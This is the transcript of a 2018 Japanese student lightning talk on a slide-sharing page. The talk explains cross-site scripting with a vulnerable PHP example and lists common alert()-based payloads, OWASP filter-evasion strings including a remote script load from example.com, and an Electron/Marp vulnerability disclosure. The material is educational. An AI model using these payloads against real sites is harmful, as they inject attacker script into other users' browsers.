Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSSの入力値を調べてみた / searching xss insertion value

Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.4k

XSSの入力値を調べてみた / searching xss insertion value

2018/02/03 学生LT at freee

Tomoyuki KOYAMA

February 03, 2018
Tweet

More Decks by Tomoyuki KOYAMA

See All by Tomoyuki KOYAMA
Reading HTTP Client Hints
tomoyk
0
57
Log message with JSON item count for root cause analysis in microservices
tomoyk
0
140
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
280
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
370
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
820
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
360
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
160
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
160
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
290

Other Decks in Technology

See All in Technology
君も受託系GISエンジニアにならないか
sudataka
2
430
明日からできる!技術的負債の返済を加速するための実践ガイド~『ホットペッパービューティー』の事例をもとに~
recruitengineers
PRO
3
400
エンジニアが加速させるプロダクトディスカバリー 〜最速で価値ある機能を見つける方法〜 / product discovery accelerated by engineers
rince
4
350
人はなぜISUCONに夢中になるのか
kakehashi
PRO
6
1.7k
エンジニアのためのドキュメント力基礎講座〜構造化思考から始めよう〜(2025/02/15jbug広島#15発表資料)
yasuoyasuo
17
6.8k
組織貢献をするフリーランスエンジニアという生き方
n_takehata
1
1.3k
リアルタイム分析データベースで実現する SQLベースのオブザーバビリティ
mikimatsumoto
0
1.4k
偶然 × 行動で人生の可能性を広げよう / Serendipity × Action: Discover Your Possibilities
ar_tama
1
1.1k
滅・サービスクラス🔥 / Destruction Service Class
sinsoku
6
1.6k
現場で役立つAPIデザイン
nagix
33
12k
モノレポ開発のエラー、誰が見る?Datadog で実現する適切なトリアージとエスカレーション
biwashi
6
810
Building Products in the LLM Era
ymatsuwitter
10
5.5k

Featured

See All Featured
Designing Experiences People Love
moore
140
23k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
356
29k
Bootstrapping a Software Product
garrettdimon
PRO
306
110k
It's Worth the Effort
3n
184
28k
Making the Leap to Tech Lead
cromwellryan
133
9.1k
Into the Great Unknown - MozCon
thekraken
35
1.6k
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
133
33k
The Power of CSS Pseudo Elements
geoffreycrofte
75
5.5k
10 Git Anti Patterns You Should be Aware of
lemiorhan
PRO
656
59k
Testing 201, or: Great Expectations
jmmastey
42
7.2k
Principles of Awesome APIs and How to Build Them.
keavy
126
17k
Facilitating Awesome Meetings
lara
52
6.2k

Transcript

  1. XSS

  2. B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,

    Seccamp, etc

  3. XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input

    During Web Page Generation ('Cross-site Scripting') (3.0)

  4. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>

  5. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>

  6. XSS Stored XSS( ) Re ected XSS( ) DOM Based

    XSS

  7. XSS == XSS

  8. <script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)

    <- a href

  9. XSS

  10. ? / . XSS . XSS .

  11. ?

  12. OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html

  13. ( ) 3

  14. [1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">

    </script>

  15. [2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>

  16. [3] <img src=x onerror=&#x6A&#x61&#x76&#x61&#x73 &#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65 &#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> &#x... HTML (16 )

    . ... <img src="x" onerror="javascript:alert('XSS')">

  17. ( )

  18. ( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;

    URL=http://;URL=http://yahoo.co.jp/;">
  19. None

  20. Electron Marp Electron Web ... <script>alert()</script> alert ...( )

  21. ?

  22. JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider

    on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “

  23. XSS XSS alert() Electron